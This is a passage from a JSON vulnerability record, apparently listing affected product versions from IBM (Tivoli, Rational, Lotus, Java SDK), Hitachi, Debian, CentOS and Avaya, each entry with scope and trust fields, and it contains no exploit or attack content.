0.3, "vendor": "ibm", "version": "5.1.1" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.1" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.0" }, { "model": "tivoli storage productivity center fp3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.1" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.0" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "tivoli provisioning manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "tivoli netview for z/os", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3" }, { "model": "tivoli monitoring fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.33" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.32" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.3" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.29" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.2" }, { "model": "tivoli monitoring fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.104" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.1" }, { "model": "tivoli monitoring fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.203" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.0.1" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.3.1" }, { "model": "tivoli monitoring fp6", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.2" }, { "model": "tivoli monitoring fixpack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.24" }, { "model": "tivoli endpoint manager for remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.1" }, { "model": "tivoli endpoint manager for remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0.1" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.2" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.1" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.2" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.1" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.13" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.12" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.11" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1.5" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1.4" }, { "model": "system storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "spss modeler", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "15.0" }, { "model": "spss modeler", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "14.2" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "56009.7" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.4" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.4" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.3" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.2" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.16" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.02" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0.1" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.5" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "rational software architect design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.3" }, { "model": "rational software architect design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.2" }, { "model": "rational software architect design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "rational software architect design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "rational software architect design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.01" }, { "model": "rational software architect design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.4" }, { "model": "rational software architect design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "rational software architect design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "rational rhapsody design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.4" }, { "model": "rational rhapsody design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.3" }, { "model": "rational rhapsody design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.2" }, { "model": "rational rhapsody design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "rational rhapsody design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "rational rhapsody design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.0.1" }, { "model": "rational rhapsody design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.4" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.3" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.16" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.04" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.5" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.4" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.4" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.3" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.1" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.01" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.21" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.2" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "rational policy tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "rational policy tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "rational policy tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.6" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.12" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.11" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.11" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "rational insight ifix1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1" }, { "model": "rational engineering lifecycle manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.4" }, { "model": "rational engineering lifecycle manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.3" }, { "model": "rational engineering lifecycle manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.0.1" }, { "model": "rational engineering lifecycle manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "os/400 v5r4m0", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "operational decision manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "operational decision manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.8" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.7" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.6" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.5" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.4" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.3" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.2" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.1" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.3" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.3" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.2" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.1" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.5" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.4" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.3" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.2" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.1" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.6" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.5" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.4" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.3" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.2" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.1" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.4" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.3" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.1" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.1" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.4" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.3" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.2" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.1" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "jre", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "java se", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.2" }, { "model": "java se", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "java se", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "java se", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "java sdk", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.2" }, { "model": "java sdk sr4-fp2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "java sdk", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "java sdk sr5-fp2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.1" }, { "model": "java sdk sr13-fp2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "java sdk", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "java sdk sr16-fp2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "java sdk", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5" }, { "model": "java sdk sr13-fp17", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.2" }, { "model": "integration bus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.0" }, { "model": "infosphere optim solution for data growth", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "infosphere optim solution for data growth", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1" }, { "model": "infosphere optim solution for data growth", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "infosphere optim data masking solution", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0" }, { "model": "infosphere optim data masking solution", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.0" }, { "model": "infosphere optim data masking solution", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0" }, { "model": "infosphere optim data growth solution for z/os", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "infosphere optim data growth solution for z/os", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1" }, { "model": "infosphere optim data growth solution for z/os", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.7" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "i v5r4", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "flex system manager types", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "87341.3" }, { "model": "flex system manager types", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "87341.1.0" }, { "model": "flex system manager types", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "87311.3" }, { "model": "flex system manager types", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "87311.1.0" }, { "model": "flex system manager types", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79551.3" }, { "model": "flex system manager types", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79551.1.0" }, { "model": "cognos express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "cognos express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "cognos express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "cognos express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "cognos business intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "cognos business intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "cognos business intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4.1" }, { "model": "cognos business intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "cognos business intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "cloudburst", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.1" }, { "model": "cloudburst", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "cloudburst", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2" }, { "model": "hp-ux b.11.31", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "hp-ux b.11.11", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "8" }, { "model": "ucosminexus service architect", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "8" }, { "model": "ucosminexus operator", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "8" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "8" }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "cosminexus studio", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "cosminexus studio", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "4.0" }, { "model": "cosminexus server web edition", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-4" }, { "model": "cosminexus server standard edition", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-4" }, { "model": "cosminexus developer", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.0" }, { "model": "cosminexus developer", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "cosminexus client", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "cosminexus application server", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.0" }, { "model": "cosminexus application server", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5.0" }, { "model": "cosminexus", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "9.0" }, { "model": "cosminexus", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "8.0" }, { "model": "cosminexus", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.0" }, { "model": "linux", "scope": null, "trust": 0.3, "vendor": "gentoo", "version": null }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "6" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "5" }, { "model": "voice portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1.3" }, { "model": "voice portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1.2" }, { "model": "voice portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1.1" }, { "model": "voice portal sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "voice portal sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "voice portal sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "voice portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "voice portal sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "voice portal sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "voice portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "messaging application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.0" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "ir", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.0" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.1" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "conferencing standard edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "conferencing standard edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "cms r17", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "cms r16.3", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "cms r16", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "cms r15", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "call management system r17.0", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.9.3" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.8.3" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.0.3" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.1" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": 